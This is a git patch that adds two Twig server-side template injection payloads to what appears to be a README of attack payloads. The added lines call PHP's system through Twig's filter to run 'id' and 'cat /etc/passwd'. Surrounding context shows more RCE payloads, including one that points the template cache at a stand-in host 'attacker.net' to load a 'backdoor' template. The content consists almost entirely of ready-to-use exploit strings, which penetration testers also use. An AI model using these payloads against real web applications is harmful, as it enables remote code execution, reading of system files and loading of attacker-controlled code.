From 8b78c2fe71e7eebe7548f20eb2348c1151a870e1 Mon Sep 17 00:00:00 2001 From: SakiiR SakiiR Date: Sun, 29 Mar 2020 23:19:27 +0200 Subject: [PATCH] Added filter(system) twig RCE --- Server Side Template Injection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 0f780ee..9bf3241 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -157,6 +157,8 @@ $output = $twig > render ( {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} ``` Example with an email passing FILTER_VALIDATE_EMAIL PHP.